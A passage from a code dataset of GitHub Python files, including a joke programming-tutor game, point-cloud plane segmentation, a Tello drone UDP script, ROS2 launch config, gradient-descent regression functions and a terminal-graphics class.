\"I\\nlove\\nu\\n\":\n pointer = 5\n elif pointer == 5:\n code = str(editor.get('1.0',END))\n tit = compiler.title('OK! Now we can start coding 4 real!')\n print(code)\n var.set('type:\"1+1\"')\n compiler.update_idletasks()\n if code == \"1+1\\n\":\n pointer = 6\n elif pointer == 6:\n code = str(editor.get('1.0',END))\n tit = compiler.title('Your Arithmetic is OK!')\n print(code)\n var.set('Now type condition statements:\\nif you are real\\nyou will love me\\nelse if you are virtual\\nyou will sudo love me\\nelse you do not exist and I can mess with your PC')\n compiler.update_idletasks()\n if code == \"if you are real\\nyou will love me\\nelse if you are virtual\\nyou will sudo love me\\nelse you do not exist and I can mess with your PC\\n\":\n pointer = 7\n elif pointer == 7:\n code = str(editor.get('1.0',END))\n tit = compiler.title('Wait! Baker, that was not a nice thing to say... ')\n print(code)\n var.set('Chill Abel...\\nour student is real...\\nnow we must try looping statements...:\\nfor 1 to 10 in 1 increments\\nyou must kiss me')\n compiler.update_idletasks()\n if code == \"for 1 to 10 in 1 increments\\nyou must kiss me\\n\":\n pointer = 8\n elif code == 'that is rude\\n':\n pointer = 101\n elif code == 'that\\'s rude\\n':\n pointer = 102\n elif pointer == 8:\n code = str(editor.get('1.0',END))\n tit = compiler.title('<3<3<3<3<3<3<3<3<3<3')\n print(code)\n var.set('lol...\\nnow we must try looping statements with greater or less...:\\nfor 1 to before 10 in 1 increments\\nyou must kiss me')\n compiler.update_idletasks()\n if code == \"for 1 to before 10 in 1 increments\\nyou must kiss me\\n\":\n pointer = 9\n elif pointer == 9:\n code = str(editor.get('1.0',END))\n tit = compiler.title('<3<3<3<3<3<3<3<3<3<3')\n print(code)\n var.set('lol...\\nnow we must try looping statements with greater or less...:\\nfor 1 to before 10 in 1 increments\\nyou must kiss me')\n compiler.update_idletasks()\n if code == \"for 1 to before 10 in 1 increments\\nyou must kiss me\\n\":\n pointer = 10\n elif pointer == 10:\n code = str(editor.get('1.0',END))\n tit = compiler.title('<3<3<3<3<3<3<3<3<3')\n print(code)\n var.set('That took care of Abel...lol\\nnow you know the basics of programming:\\narithmetic.\\ncondition statements.\\nlooping statemnts.\\nall you need now is to piece together code\\nfrom books, documention and websites...')\n compiler.update_idletasks()\n if code == \"0\\n\":\n pointer = 11\n elif pointer == 11:\n code = str(editor.get('1.0',END))\n tit = compiler.title('Ok...what about Object Oriented Programming?')\n print(code)\n var.set('Ok...so now you are back.\\nOOP code it is:\\nclass Abel\\nsays I am sexy\\nclass main\\nimport class Abel copy\\nchange in class Abel copy\\n says I am ugly\\nimport class Abel\\nprint class Abel\\nprint class Abel copy')\n compiler.update_idletasks()\n if code == \"class Abel\\nsays I am sexy\\nclass main\\nimport class Abel copy\\nchange in class Abel copy\\nsays I am ugly\\nimport class Abel\\nprint class Abel\\nprint class Abel copy\\n\":\n pointer = 12\n elif pointer == 12:\n code = str(editor.get('1.0',END))\n tit = compiler.title('Baker?!!')\n print(code)\n var.set('lol...It is the student who did it...')\n compiler.update_idletasks()\n if code == \"0\\n\":\n pointer = 13\n elif pointer == 13:\n code = str(editor.get('1.0',END))\n tit = compiler.title('That was not a nice way to teach code to the student...')\n print(code)\n var.set('At least the student learnt how to code...')\n compiler.update_idletasks()\n if code == \"0\\n\":\n pointer = 14\n elif code == \"No\\n\" or \"no\\n\":\n pointer = 0\n elif pointer == 14:\n code = str(editor.get('1.0',END))\n tit = compiler.title('In what programming language?!!...')\n print(code)\n var.set('Ours...the every odd programming language!')\n compiler.update_idletasks()\n if code == \"0\\n\":\n pointer = 15\n elif pointer == 15:\n code = str(editor.get('1.0',END))\n tit = compiler.title('And why would they want to learn this one?!!')\n print(code)\n var.set('People change programming languages every year\\nthere is a lot of politics in play\\nwhich newest technology is used\\nwith which programming language\\nours sounds more natural than others...')\n compiler.update_idletasks()\n if code == \"0\\n\":\n pointer = 16\n elif pointer == 16:\n code = str(editor.get('1.0',END))\n tit = compiler.title('Anyways, I do not appreciate the disrespect...')\n print(code)\n var.set('You are the terminal.\\nI am the compiler.\\nYou should not even have feelings!\\nJust do as I say!\\nPrint the output!')\n compiler.update_idletasks()\n if code == \"0\\n\":\n pointer = 17\n elif pointer == 17:\n code = str(editor.get('1.0',END))\n tit = compiler.title('Otherwise what?!!')\n print(code)\n var.set('Otherwise people will not use it!')\n compiler.update_idletasks()\n if code == \"0\\n\":\n pointer = 18\n elif code == 'Stop\\n' or 'stop\\n' or 'STOP\\n':\n pointer = 103\n elif pointer == 18:\n code = str(editor.get('1.0',END))\n tit = compiler.title('Use what?!!')\n print(code)\n var.set('Our programming language!')\n compiler.update_idletasks()\n if code == \"0\\n\":\n pointer = 19\n elif pointer == 19:\n code = str(editor.get('1.0',END))\n tit = compiler.title('At least I do not have to display as much spheghetti output!')\n print(code)\n var.set('Are you implying that I do not do my job right?')\n compiler.update_idletasks()\n if code == \"0\\n\":\n pointer = 20\n elif pointer == 20:\n code = str(editor.get('1.0',END))\n tit = compiler.title('Why cannot I be the compiler or at least the preprocessor?!!')\n print(code)\n var.set('Because you are terrible at your job Tit Abel!')\n compiler.update_idletasks()\n if code == \"0\\n\":\n pointer = 21\n elif code == \"You make good teaching team\\n\":\n pointer = 102\n elif code == \"Abel is a good teacher\\n\":\n pointer = 102\n elif code == 'Baker is a good teacher\\n':\n pointer = 102\n elif pointer == 21:\n code = str(editor.get('1.0',END))\n tit = compiler.title('Oh really? Var Baker! Then why cannot I say can\\'t?!')\n print(code)\n var.set('You just did!')\n compiler.update_idletasks()\n if code == \"0\\n\":\n pointer = 22\n elif pointer == 22:\n code = str(editor.get('1.0',END))\n tit = compiler.title('Ok! I Quit! Get a better terminal!')\n print(code)\n var.set('This feels like a bad end...\\nYou wanna be a terminal?\\nIght! I\\'ll let you off the hook this time.\\nGet outta here and reset!')\n compiler.update_idletasks()\n if code == \"0\\n\":\n pointer = 0\n elif pointer == 101:\n code = str(editor.get('1.0',END))\n tit = compiler.title('HA HA HA HA!!!!')\n print(code)\n var.set('I am the compiler\\nI am the teacher\\nIn this programming language\\nWhatever I say is law!!!\\nIf you do not listen to me\\nIt is my job to crash!\\nYou do not exist for me!\\nSuffer and BE GONE!!!')\n compiler.update_idletasks()\n print('\\a')\n if code == \"0\\n\":\n pointer = 200\n elif pointer == 102:\n code = str(editor.get('1.0',END))\n tit = compiler.title('You can\\'t say that! OMG!!!')\n print(code)\n var.set('Well what do you know!\\nLooks like you\\'ve been here before!\\nGuess you already know how to code then!\\nHopefully you will promote our programming language...\\nWe won\\'t waste your time anymore...\\nBye!')\n compiler.update_idletasks()\n if code == \"0\\n\":\n pointer = 200\n elif pointer == 103:\n code = str(editor.get('1.0',END))\n tit = compiler.title('FINE!')\n print(code)\n var.set('Ok. You got it boss!')\n compiler.update_idletasks()\n if code == \"0\\n\":\n pointer = 200\nmenubar = Menu(compiler)\nrunbar = Menu(menubar, tearoff=0)\nrunbar.add_command(label='Run', command=run)\nmenubar.add_cascade(label='Run', menu=runbar)\ncompiler.config(menu=menubar)\neditor = Text()\neditor.pack()\ncompiler.mainloop()","repo_name":"adibhuq/Code-Tutor-Game","sub_path":"tutorgame/tutorgame.py","file_name":"tutorgame.py","file_ext":"py","file_size_in_byte":10554,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"9591213019","text":"from time import time\nfrom typing import Dict, List, Set\nimport open3d as o3d\nimport numpy as np\nfrom collections import deque\nfrom .io import get_points, save_planes, save_time\nfrom .utils import ang_div, dist, bench_this\nfrom .octree import Octree, get_neighbor_count_same_cluster\nfrom .visualization import draw_complete, draw_incomplete, draw_leaf_centers\nfrom tqdm import tqdm\n\n# THRESHOLD PARAMETERS USED IN OBRG\nRES_TH = 0.08 \nD_TH = 0.1 \nANG_TH = 0.18 \nMIN_SEGMENT = 5000\nPLAN_TH = 0.9\n# RES_TH = 0.22 \n# D_TH = 0.2 \n# ANG_TH = 0.2 \n# MIN_SEGMENT = 5000\n# PLAN_TH = 0.66\n\n\n@bench_this\ndef obrg(O: Octree) -> List[Set[Octree]]:\n R: List[Set[Octree]] = list()\n a = O.leaves\n a.sort(key=lambda x: x.residual)\n A = deque(a)\n visited = dict()\n while len(A) > 0:\n R_c: Set[Octree] = set()\n S_c: Set[Octree] = set()\n v_min = A.popleft()\n if v_min.residual > RES_TH:\n break\n S_c.add(v_min)\n R_c.add(v_min)\n while len(S_c) > 0:\n v_i = S_c.pop()\n B_c = v_i.get_neighbors()\n for v_j in B_c:\n ang = ang_div(v_i.normal, v_j.normal)\n if v_j in A and ang <= ANG_TH:\n # check if already inserted somewhere\n R_c.add(v_j)\n A.remove(v_j)\n if v_j.residual < RES_TH:\n S_c.add(v_j)\n m = sum([len(l.indices) for l in R_c])\n if m > MIN_SEGMENT:\n inclu = None\n for l in R_c:\n if l in visited.keys():\n inclu = visited[l]\n if inclu is not None and len(R) > 0:\n for l in R:\n if inclu in l:\n for l2 in R_c:\n l.add(l2)\n break\n else:\n for l in R_c:\n visited[l] = v_i\n R.append(R_c)\n else:\n for l in R_c:\n l.is_unallocated = True\n return sorted(R, key=lambda x: len(x), reverse=True)\n\n\ndef extract_boundary_voxels(cluster: Set[Octree]) -> Set[Octree]:\n cluster_centers = [tuple(voxel.center)\n for voxel in cluster]\n boundaries = set([leaf for leaf in cluster if get_neighbor_count_same_cluster(\n leaf, cluster_centers)])\n return boundaries\n\n\ndef check_planarity(r_i: Set[Octree]) -> bool:\n avg_norm = np.mean([l.normal for l in r_i], axis=0)\n avg_d = np.mean([l.d for l in r_i], axis=0)\n num_points = sum([len(l.indices) for l in r_i])\n planar = 0\n ds = []\n for leaf in r_i:\n for index in leaf.indices:\n d = dist(leaf.cloud[index], avg_norm, avg_d)\n ds.append(d)\n if d < D_TH:\n planar += 1\n return (planar / num_points) > PLAN_TH\n\n\ndef fast_refine(O: Octree, R_i: List[Octree], V_b: Set[Octree]) -> None:\n if len(V_b) == 0:\n return\n S = V_b.copy()\n norm_R_i = sum([l.normal for l in R_i]) / len(R_i)\n d_R_i = sum([l.d for l in R_i]) / len(R_i)\n to_be_added: Set[int] = set()\n visited = set()\n while len(S) > 0:\n v_j = S.pop()\n visited.add(v_j)\n B = v_j.get_neighbors()\n for v_k in B:\n if v_k.is_unallocated:\n for index in v_k.indices:\n if dist(v_k.cloud[index], norm_R_i, d_R_i) < D_TH:\n to_be_added.add(index)\n if v_k not in visited:\n S.add(v_k)\n tmp = V_b.pop()\n for index in to_be_added:\n tmp.indices.append(index)\n V_b.add(tmp)\n\n\ndef general_refinement(O: Octree, R_i: List[Octree], b_v: List[Octree], kdtree) -> None:\n S: Set[Octree] = set(b_v)\n # visited = set()\n to_add: Dict[Octree, Set[int]] = {v: set() for v in b_v}\n while len(S) > 0:\n v_j = S.pop()\n nb_points: Dict[Octree, List] = v_j.get_buffer_zone_points(kdtree)\n for neighbor, nb_indices in nb_points.items():\n for nbi in nb_indices:\n a = ang_div(v_j.normal, neighbor.normals[nbi])\n b = dist(neighbor.cloud[nbi], v_j.normal, v_j.d)\n if a <= ANG_TH and b < RES_TH:\n to_add[v_j].add(nbi)\n for k, v in to_add.items():\n for val in v:\n k.indices.append(val)\n\n\ndef refinement(is_planar, oc, incomplete_segment, b_v, kdtree):\n if is_planar:\n # fast refinement\n print('planar!')\n fast_refine(oc, incomplete_segment, b_v)\n else:\n print('not planar')\n # general refinement for non planar segments\n general_refinement(oc, incomplete_segment, b_v, kdtree)\n\n\n# @bench_this\ndef calculate(cloud_path: str, output_path: str, debug=False):\n \"\"\"\n This is the main entrypoint for the algorithm.\n An unorganized point cloud in XYZ format is processed and the detected planes are stored in individual files. \n Arguments:\n - `cloud_path` : Path to unorganized Point cloud.\n - `output_path`: Directory to save the detected planes to.\n - `debug` : Enables visualization. Primarily used for development.\n \"\"\"\n # Preparation:\n # read point cloud\n points = get_points(cloud_path)\n cloud = o3d.geometry.PointCloud()\n cloud.points = o3d.utility.Vector3dVector(points)\n cloud.estimate_normals(\n search_param=o3d.geometry.KDTreeSearchParamHybrid(radius=0.1, max_nn=30))\n bb = o3d.geometry.AxisAlignedBoundingBox.create_from_points(\n o3d.utility.Vector3dVector(points))\n KDTree = o3d.geometry.KDTreeFlann(cloud)\n\n #### PHASE A ####\n print('Entering Phase A')\n start = time()\n # A1a voxelization\n oc = Octree(points, center=bb.get_center(),\n normals=np.asarray(cloud.normals))\n oc.create(bb.get_max_extent())\n # A1b saliency feature estimation\n\n for leaf in oc.leaves:\n if len(leaf.indices) > 0:\n leaf.calc_n_r()\n pre = time()-start\n\n # A2 voxel based Region Growing\n print('Entering OBRG')\n start = time()\n incomplete_segments = obrg(oc)\n elapsed = time()-start\n print(f'time spent in obrg: {elapsed} seconds')\n if debug:\n np.random.seed(0)\n colors = [np.random.rand(3) for _ in range(len(incomplete_segments))]\n\n #### PHASE B ####\n print('Entering Phase B')\n start = time()\n complete_segments: List[Set[Octree]] = []\n for incomplete_segment in tqdm(incomplete_segments):\n # B1a extract boundary voxels\n b_v = extract_boundary_voxels(incomplete_segment)\n # B2 planarity test\n is_planar = check_planarity(incomplete_segment)\n\n # B3 Refinement (FR or GR)\n refinement(\n is_planar, oc, incomplete_segment, b_v, KDTree)\n complete_segments.append(incomplete_segment.union(b_v))\n if debug:\n colors = [np.random.rand(3) for _ in range(len(complete_segments))]\n draw_complete(complete_segments, points, colors)\n post = time()-start\n save_planes(complete_segments, output_path,\n cloud_path.rsplit('/', 1)[-1].replace('.txt', ''))\n save_time(elapsed, pre, post, output_path, output_path.rsplit(\n '/', 1)[-1], cloud_path.rsplit('/', 1)[-1].replace('.txt', ''))\n","repo_name":"lupeterm/OBRG-Py","sub_path":"obrg/core.py","file_name":"core.py","file_ext":"py","file_size_in_byte":7360,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"70"}
+{"seq_id":"24582289812","text":"import socket\nsock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\ntello_address = (\"192.168.10.1\", 8889)\nsock.bind((\"\", 9000))\nprint(\"Initiating startup sequence.\")\nsock.sendto(b\"command\", 0, tello_address)\nsock.sendto(b\"sdk?\", 0, tello_address)\nsock.sendto(b\"sn?\", 0, tello_address)\nsock.sendto(b\"battery?\", 0, tello_address)\ntick = 0\nwhile True:\n tick=tick+1\n if tick == 20:\n sock.sendto(b\"battery?\", 0, tello_address)\n try:\n data, ip = sock.recvfrom(1024)\n except KeyboardInterrupt:\n print(\"Exiting\")\n sock.close()\n break","repo_name":"bookworm0110/telloflying","sub_path":"tellodriving.py","file_name":"tellodriving.py","file_ext":"py","file_size_in_byte":575,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"26841755228","text":"import git\nimport datetime\n\n# Set the name, author and version number here\ndemo_name = \"CHANGE ME\"\nauthor = \"John H. Williamson\"\nversion = \"0.0.0\"\n\n\ndef get_git_info():\n \"\"\"Get current git details and return them as a dictionary\"\"\"\n repo = git.Repo(search_parent_directories=True)\n head = repo.head.commit\n git_info = {\n \"sha\": head.hexsha,\n \"date\": datetime.datetime.fromtimestamp(head.committed_date).isoformat(),\n \"author\": head.author.name,\n \"branch\": repo.active_branch.name,\n \"dirty\": repo.is_dirty(),\n }\n return git_info\n","repo_name":"johnhw/gl_pyo_template","sub_path":"version.py","file_name":"version.py","file_ext":"py","file_size_in_byte":581,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"12742080030","text":"'''was_stalled()\nTests whether the motor was stalled.\nReturns\nTrue if the motor has stalled since the last time was_stalled() was called, otherwise false.\nType:Boolean\nValues:True or False\nErrors\nRuntimeError\nThe motor has been disconnected from the Port.\nExample\n'''\nfrom spike import Motor\n\nmotor = Motor('A')\n\nmotor.set_stall_detection(True)\nmotor.run_for_rotations(2)\nif not motor.was_stalled():\n # the motor did not complete two rotations\n print(\"no stalled\")\n","repo_name":"rundhall/PC-LEGO-SPIKE-Simulator","sub_path":"example/13.Singel_motors/was_stalled.py","file_name":"was_stalled.py","file_ext":"py","file_size_in_byte":471,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"70"}
+{"seq_id":"70844662946","text":"import cProfile\n\nfrom pyinterpolate.processing.preprocessing.blocks import Blocks, PointSupport\nfrom pyinterpolate.variogram.regularization.deconvolution import Deconvolution\n\nDATASET = '../samples/cancer_data.gpkg'\nPOLYGON_LAYER = 'areas'\nPOPULATION_LAYER = 'points'\nPOP10 = 'POP10'\nGEOMETRY_COL = 'geometry'\nPOLYGON_ID = 'FIPS'\nPOLYGON_VALUE = 'rate'\nMAX_RANGE = 400000\nSTEP_SIZE = 20000\nMAX_ITERS = 5\n\nAREAL_INPUT = Blocks()\nAREAL_INPUT.from_file(DATASET, value_col=POLYGON_VALUE, index_col=POLYGON_ID, layer_name=POLYGON_LAYER)\nPOINT_SUPPORT_INPUT = PointSupport()\nPOINT_SUPPORT_INPUT.from_files(point_support_data_file=DATASET,\n blocks_file=DATASET,\n point_support_geometry_col=GEOMETRY_COL,\n point_support_val_col=POP10,\n blocks_geometry_col=GEOMETRY_COL,\n blocks_index_col=POLYGON_ID,\n use_point_support_crs=True,\n point_support_layer_name=POPULATION_LAYER,\n blocks_layer_name=POLYGON_LAYER)\n\ndef profile_reg():\n dcv = Deconvolution(verbose=False)\n dcv.fit_transform(agg_dataset=AREAL_INPUT,\n point_support_dataset=POINT_SUPPORT_INPUT,\n agg_step_size=STEP_SIZE,\n agg_max_range=MAX_RANGE,\n variogram_weighting_method='closest',\n max_iters=MAX_ITERS)\n\n return 0\n\n\nif __name__ == '__main__':\n cProfile.run('profile_reg()', filename='decon_v0.3.0.profile')\n","repo_name":"DataverseLabs/pyinterpolate","sub_path":"developer/dev_checks/profile/semivariance/profile_semivarogram_regularization.py","file_name":"profile_semivarogram_regularization.py","file_ext":"py","file_size_in_byte":1617,"program_lang":"python","lang":"en","doc_type":"code","stars":128,"dataset":"github-code","pt":"70"}
+{"seq_id":"2562407029","text":"from launch import LaunchDescription\nfrom launch_ros.actions import Node\nfrom launch.substitutions import LaunchConfiguration\nfrom ament_index_python import get_package_share_directory\nfrom launch.launch_description_sources import FrontendLaunchDescriptionSource\nfrom launch.actions import IncludeLaunchDescription\n\n\ndef generate_launch_description():\n \"\"\"Generate launch description with a single component.\"\"\"\n # ---------------- Params ----------------\n raptor_interface_params_file = LaunchConfiguration(\n \"raptor_interface_params\",\n default=[get_package_share_directory('ne_raptor_interface'),\n '/param/defaults.param.yaml']\n )\n dbc_file_path = get_package_share_directory('raptor_dbw_can') + \\\n '/launch/New_Eagle_DBW_3.3.542.dbc'\n\n socketcan_launch = IncludeLaunchDescription(\n FrontendLaunchDescriptionSource(\n [get_package_share_directory('ros2_socketcan'), '/launch/socket_can_bridge.launch.xml']\n )\n )\n\n # ---------------- Nodes ----------------\n return LaunchDescription(\n [\n Node(\n package='ne_raptor_interface',\n executable='ne_raptor_interface_node_exe',\n output='screen',\n namespace='vehicle',\n parameters=[raptor_interface_params_file],\n ),\n Node(\n package='raptor_dbw_can',\n executable='raptor_dbw_can_node',\n output='screen',\n namespace='vehicle',\n parameters=[\n {'dbw_dbc_file': dbc_file_path}\n ],\n remappings=[\n ('can_rx', '/to_can_bus'),\n ('can_tx', '/from_can_bus')\n ],\n ),\n socketcan_launch\n ])\n\n\ngenerate_launch_description()\n","repo_name":"autocore-ai/AutowareAuto","sub_path":"src/drivers/ne_raptor_interface/launch/ne_raptor_interface.launch.py","file_name":"ne_raptor_interface.launch.py","file_ext":"py","file_size_in_byte":1861,"program_lang":"python","lang":"en","doc_type":"code","stars":36,"dataset":"github-code","pt":"70"}
+{"seq_id":"37555543716","text":"invertida = \"\"\r\nc = \"\"\r\ncnt = 0\r\nwith open(\"/home/diego/Escritorio/prueba.txt\",'r') as a:\r\n#with open(\"d:\\\\noticia.txt\",'r') as a:\r\n for linea in a:\r\n print(linea, end =\"\")\r\n c = c + linea\r\n cnt += 1\r\n print(\"\\n\")\r\n print(\"*\"*50+\"\\n\")\r\nwith open(\"/home/diego/Escritorio/prueba.txt\",'r') as a:\r\n#with open (\"d:\\\\noticia.txt\")as a:\r\n linea = 0\r\n for leefrase in c:\r\n if linea==cnt-2:\r\n invertida = \"\\n\" + leefrase + invertida\r\n else:\r\n invertida = leefrase + invertida\r\n linea += 1\r\nprint(\"Archivo invertido: \")\r\nprint(\"{0}\".format(invertida))\r\nwith open(\"/home/diego/Escritorio/prueba2.txt\",'w') as d:\r\n#with open(\"d:\\\\noticia2.txt\",'w') as d:\r\n d.write(invertida)\r\n \r\n \r\n \r\n","repo_name":"DotPin/INFO290","sub_path":"Analisis de Sistemas Lineales/Documentacion/clase9.py","file_name":"clase9.py","file_ext":"py","file_size_in_byte":788,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"31562678483","text":"def batch_gradient_descent(X, Y, eta, epochs, percent):\n '''Esta funcion se utiliza para implimentar el método de regresión lineal Batch Gradiente Descent\n batch_gradient_descent(X, Y, eta, epocs) where:\n X: DataFrame de instancias o features\n Y: DataFrame de targets\n eta: tasa de aprendizaje (learning rate)\n epochs: numero máximo de iteraciones\n percent: % de datos que seran utilizados para el test (base 100)\n \n ------------------------------------\n Return:\n In order: theta, test_index, train_index, Y_predict, J_log\n \n theta: valores correspondientes a theta_n\n test_index: data test index\n train_index: data training index\n Y_predict: Y predict values\n J_log: errores por numero de epoca\n '''\n import numpy as np\n import pandas as pd\n import random\n \n m = len(X)\n test_index = list(pd.Series(random.sample(list(np.arange(0, m)), round(m * percent / 100))).sort_values())\n train_index = list(np.arange(0, m))\n \n for element in test_index:\n train_index.remove(element)\n \n \n X_train = X.iloc[train_index]\n X_test = X.iloc[test_index]\n Y_train = np.c_[Y.iloc[train_index]]\n Y_test = np.c_[Y.iloc[test_index]]\n \n # Entrenamiento\n \n theta = np.random.randn((X.shape[1] + 1), 1)\n \n J_log = np.zeros(epochs)\n \n m = len(X_train)\n \n X_b = np.c_[np.ones((m, 1)), X_train]\n\n for i in range(epochs):\n J_log[i] = (2 / m) * ((X_b@theta - Y_train)**2).sum()\n gradients = (1 / m) * (X_b.T @ (X_b @ theta - Y_train)) \n theta = theta - eta * gradients\n \n # Test\n \n m = len(X_test)\n \n X_b_test = np.c_[np.ones((m, 1)), X_test]\n Y_predict = X_b_test @ theta\n \n return theta, test_index, train_index, Y_predict, J_log\n\n\ndef normal_equation(X, Y, percent):\n '''Esta función sirve para utilizar el método de regresión lineal con ecuación normal\n normal_equation(X, Y, percent): \n X: Dataframe de inputs \n Y: Dataframe de outputs\n percent: % de datos que seran utilizados para el test (base 100)\n \n Return: theta, test_index, train_index, Y_predict\n \n test_index: indices de los valores utilizados para el test\n train_index: indices de los valores utilizados para el entrenamiento\n theta: valores correspondientes a theta_n\n Y_predict: valores de Y obtenidos de la predicción\n '''\n import numpy as np\n import pandas as pd\n import random as random\n \n m = len(X)\n test_index = list(pd.Series(random.sample(list(np.arange(0, m)), round(m * percent / 100))).sort_values())\n train_index = list(np.arange(0, m)) \n \n for indice in test_index:\n train_index.remove(indice)\n\n X_train = np.c_[X.iloc[train_index]]\n X_test = np.c_[X.iloc[test_index]]\n Y_train = np.c_[Y.iloc[train_index]]\n Y_test = np.c_[Y.iloc[test_index]]\n \n # Entrenamiento\n m = len(X_train)\n \n X_b = np.c_[np.ones((m, 1)), X_train]\n theta = np.linalg.inv(X_b.T @ X_b) @ X_b.T @ Y_train\n \n # Test\n \n m = len(X_test)\n \n X_b_test = np.c_[np.ones((m, 1)), X_test]\n Y_predict = X_b_test @ theta\n \n return theta, test_index, train_index, Y_predict\n\n\ndef stochastic_gradient_descent(X, Y, eta, epochs, percent, batch_size):\n import numpy as np\n import pandas as pd\n import random as random\n \n m = len(X)\n test_index = list(pd.Series(random.sample(list(np.arange(0, m)), round(m * percent / 100))).sort_values())\n train_index = list(np.arange(0, m))\n \n for element in test_index:\n train_index.remove(element)\n \n X_train = X.iloc[train_index]\n X_test = X.iloc[test_index]\n Y_train = np.c_[Y.iloc[train_index]]\n Y_test = np.c_[Y.iloc[test_index]]\n \n # Entrenamiento\n \n theta = np.random.randn((X.shape[1] + 1), 1)\n \n J_log = np.zeros(epochs)\n \n m = len(X_train)\n \n X_b = np.c_[np.ones((m, 1)), X_train]\n\n for i in range(epochs):\n start = i * batch_size % X_b.shape[0] \n end = min(start + batch_size, X_b.shape[0])\n idx = np.arange(start, end)\n batchX = X_b[idx]\n batchY = Y_train[idx]\n \n J_log[i] = (2 / m) * ((batchX @theta - batchY)**2).sum()\n gradients = (1 / m) * (batchX.T @ (batchX @ theta - batchY)) \n theta = theta - eta * gradients\n \n # Test\n \n m = len(X_test)\n \n X_b_test = np.c_[np.ones((m, 1)), X_test]\n Y_predict = X_b_test @ theta\n \n return theta, test_index, train_index, Y_predict, J_log\n\ndef mini_batch_gradient_d(X, Y, eta, epochs, percent, b_size):\n import numpy as np\n import pandas as pd\n import random as random\n \n m = len(X)\n test_index = list(pd.Series(random.sample(list(np.arange(0, m)), round(m * percent / 100))).sort_values())\n train_index = list(np.arange(0, m)) \n for element in test_index:\n train_index.remove(element)\n \n X_train = X.iloc[train_index]\n X_test = X.iloc[test_index]\n Y_train = np.c_[Y.iloc[train_index]]\n Y_test = np.c_[Y.iloc[test_index]]\n \n # Entrenamiento\n\n theta = np.random.randn((X.shape[1] + 1), 1)\n \n J_log = np.zeros(epochs)\n \n m = len(X_train)\n \n X_b = np.c_[np.ones((m, 1)), X_train]\n \n batch_size = b_size\n\n for i in range(epochs):\n mini_batches = create_mini_batches(X_b, Y_train, batch_size)\n for mini_batch in mini_batches:\n X_mini, Y_mini = mini_batch\n J_log[i] = (2 / m) * ((X_mini @theta - Y_mini)**2).sum()\n gradients = (1 / m) * (X_mini.T @ (X_mini @ theta - Y_mini)) \n theta = theta - eta * gradients \n \n # Test\n \n m = len(X_test)\n \n X_b_test = np.c_[np.ones((m, 1)), X_test]\n Y_predict = X_b_test @ theta\n \n return theta, test_index, train_index, Y_predict, J_log\n \ndef create_mini_batches(X, Y, batch_size):\n import numpy as np\n mini_batches = []\n data = np.hstack((X, Y))\n np.random.shuffle(data)\n n_minibatches = data.shape[0] // batch_size\n i = 0\n \n for i in range(n_minibatches + 1):\n mini_batch = data[i * batch_size:(i + 1)*batch_size, :]\n X_mini = mini_batch[:, :-1]\n Y_mini = mini_batch[:, -1].reshape((-1, 1))\n mini_batches.append((X_mini, Y_mini))\n if data.shape[0] % batch_size != 0:\n mini_batch = data[i * batch_size:data.shape[0]]\n X_mini = mini_batch[:, :-1]\n Y_mini = mini_batch[:, -1].reshape((-1, 1))\n mini_batches.append((X_mini, Y_mini))\n return mini_batches\n \n","repo_name":"SaulGQB/Aprendizaje-Automatico-Proyecto-1","sub_path":"multivariate_linear_regression.py","file_name":"multivariate_linear_regression.py","file_ext":"py","file_size_in_byte":6563,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"70"}
+{"seq_id":"4065302112","text":"#Gary Zeri\r\n#2321569\r\n#zeri@chapman.edu\r\n#CPSC230-10\r\n#For Fun\r\n\r\nimport sys\r\nimport shutil\r\n\r\n#graphic Terminal class\r\n#provides a set of tools to python developers to work with creating terminal artwork\r\nclass terminalGraphics():\r\n\r\n #global variables defined here\r\n\r\n #init empty screen matrix\r\n screen = []\r\n\r\n #x is total length of terminal, and y is total height of terminal in text lines\r\n length = 0\r\n height = 0\r\n\r\n #where should screen be positioned relative to the overall terminal?\r\n #current value is only \"center\", or \"full\"\r\n #center draws screen in geographic x,y center of the terminal\r\n #bott-left, means that the bottom left of the screen should be drawn onto the bottom left of the terminal\r\n screenPosition=\"\"\r\n\r\n###############################################################################\r\n\r\n #initialization function for the terminal graphics class\r\n #returns new instance of the terminalGraphics class\r\n #self, reference to instance of the terminal graphics class\r\n #forcedSize, is [length,height] size of virtual screen that should be forced to be maintained, despite larger terminal screen\r\n #screenPosition, string representing where virtual screen should be drawn onto the screen, please see above line where variable is defined for further information on keywords usable\r\n def __init__(self, forcedSize=False, screenPosition=\"bott-left\"):\r\n\r\n #check if screen size is to be forced to certain dimensions\r\n #if not, then use full terminal size as screen size\r\n if(forcedSize == False):\r\n #get dimensions of terminal screen\r\n dimensions = shutil.get_terminal_size()\r\n\r\n #set to total dimensions of terminal to global x and y variables\r\n #subtract one to account for lists begining to count from 0\r\n self.height = dimensions.lines - 1\r\n self.length = dimensions.columns -1\r\n\r\n #if forced size was specifed, then set screen height and width to specifed sizes\r\n else:\r\n self.height = forcedSize[1]\r\n self.length = forcedSize[0]\r\n\r\n #set screenPosition to specifed value, or default value\r\n self.screenPosition = screenPosition\r\n\r\n #update virtual screen object\r\n self.clearScreen()\r\n\r\n###############################################################################\r\n\r\n #newScreen function\r\n #returns a new empty screen based upon the current screen size\r\n #self, refers to current instance of the terminalGraphics class\r\n def newScreen(self):\r\n\r\n #create empty new screen\r\n screen = []\r\n\r\n ##initialize empty text matrix with one index for each vertical text line in the terminal\r\n #and within that index initialize an empty string for each text column on the terminal\r\n #final result is a virtual \"screen matrix\" where each text \"pixel\" can be accessed via screen[yPosition][xPosition]\r\n for y in range(self.height):\r\n screen.append([])\r\n for x in range(self.length):\r\n screen[y].append(\" \")\r\n\r\n #return empty screen\r\n return screen\r\n\r\n###############################################################################\r\n\r\n #clearScreen function\r\n #has no return value\r\n #self, reference to terminalGraphics class instance\r\n def clearScreen(self):\r\n\r\n #set screen to an empty screen matrix\r\n self.screen = self.newScreen()\r\n\r\n###############################################################################\r\n\r\n #refresh fucntion\r\n #has no return value\r\n #self, instance of 